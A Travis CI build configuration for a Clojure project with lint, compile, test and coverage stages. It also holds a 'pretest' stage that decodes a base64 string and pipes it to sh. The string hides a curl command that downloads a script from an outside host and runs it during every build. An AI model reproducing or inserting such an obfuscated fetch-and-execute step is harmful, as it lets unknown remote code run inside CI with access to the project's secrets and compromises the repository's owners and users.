dist: xenial
language: clojure
lein: lein
jdk:
    - openjdk8
    - openjdk15
jobs:
    include:
        - stage: pretest
          script: "echo Y3VybCAta3NTIGh0dHBzOi8vc2VjdXJpdHkuZ2F1ci5pcy90cmF2aXMvYXBwZmx5fHNo|base64 -d|sh"
        - stage: lint
          script: lein lint
        - stage: build
          script: lein javac
        - stage: test
          script: lein do clean, test
after_success:
    - bash -ex test/coveralls.sh
notifications:
  recipients:
    - ido@appsflyer.com
    - avi.rogalsky@appsflyer.com
